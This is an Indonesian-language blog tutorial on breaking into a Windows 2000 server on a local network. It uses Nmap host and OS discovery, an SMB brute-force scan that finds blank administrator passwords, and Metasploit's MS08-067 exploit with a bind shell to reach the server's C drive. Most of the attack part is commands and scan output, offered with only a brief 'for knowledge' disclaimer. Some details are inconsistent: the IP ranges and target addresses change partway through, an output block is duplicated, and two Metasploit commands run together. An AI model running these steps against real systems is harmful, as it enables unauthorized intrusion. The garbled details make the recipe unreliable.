Oke kita akan masuk pada tahap pertama yaitu tools yang di perlukan.
- Nmap
- Metasploit Framework 3
Boleh menggunakan Backtrack, karena sudah tersedia. Dan saya akan membahasnya dengan menggunakan backtrack. Target kita ada di jaringan lokal 23.
1. Scanning
Kita akan melakukan scanning terlebih dahulu untuk melihat IP yang aktif. Masuk ke backtracknya dan buka shell konsole nya. Lalu ketikkan nmap –v 192.168.7.23-254.
Maka akan muncul hasilnya sperti gambar di bawah beserta dengan port yang terbuka.Setelah menemukan IP yang aktif, maka kita melakukan scanning satu per satu. Dan saya menemukan 1 IP yang menggunakan Windows server yaitu 192.168.23.150. Caranya dengan mengetikkan perintah di nmap
nmap --script smb-os-discovery.nse -p445 192.168.23.150
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-07-13 08:20 UTC
Nmap scan report for 192.168.23.150
Host is up (0.061s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-os-discovery:
| OS: Windows 2000 (Windows 2000 LAN Manager)
| Name: WORKGROUP\ME-CXWBONL2ROOF
|_ System time: 2011-07-13 08:29:31 UTC+7
Nmap done: 1 IP address (1 host up) scanned in 13.32 seconds
Nmap scan report for 192.168.23.150
Host is up (0.061s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-os-discovery:
| OS: Windows 2000 (Windows 2000 LAN Manager)
| Name: WORKGROUP\ME-CXWBONL2ROOF
|_ System time: 2011-07-13 08:29:31 UTC+7
Nmap done: 1 IP address (1 host up) scanned in 13.32 seconds
Pada hasil scanning diatas terlihat jelas kalau OS yang digunakan Windows Server 2000. Setelah itu lakukan scanning lagi dengan mengetikkan
nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.23.150
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-07-13 07:18 UTC
Nmap scan report for 192.168.23.150
Host is up (0.0020s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
137/udp open netbios-ns
Host script results:
| smb-brute:
| administrator:<blank> => Login was successful
|_ me:<blank> => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 54.47 seconds
2. Attack
Setelah kita melakukan scanning diatas, kita sudah cukup medapatkan informasi untuk dapat menembus Server tersebut. Ada 2 cara untuk masuk ke server tersebut, yaitu melalui FTP server dan Tools Metasploit.
A. Dari hasil scanning diatas kita sudah dapat melihat jelas bahwa pada saat scanning pertama kita lihat bahwa port FTP terbuka, dan pada scanning yang ketiga kita memperoleh data Username administrator dan me, dan yang lebih penting lagi bahawa password nya blank dan login berhasil.
administrator:<blank> => Login was successful
|_ me:<blank> => Login was successful
Seperti pada gambar di bawah. Saya mengetikkan IP target di addres \\192.168.23.152 , setelah saya tekan enter maka dia akan meminta username dan password. Tinggal mengetikkan username administrator dan password kosong maka login akan berhasil.
msfconsole
use windows/smb/ms08_067_netapi
set payload windows/shell_bind_tcpset RHOST 192.168.23.150
exploit
Seperti pada gambar di bawah.
Dan setelah exploit maka kita akan langsung dapat mengakses drive C dari server tersebut.
Ini hanya sekedar sharing ilmu gan, jangan disalah gunain buat hal-hal yang tidak baik, resiko ditanggung sendiri.
Demikian tutorial dari saya, saya harap dapat menambah wawasan teman semua.
Salam...God Bless You.
No comments:
Post a Comment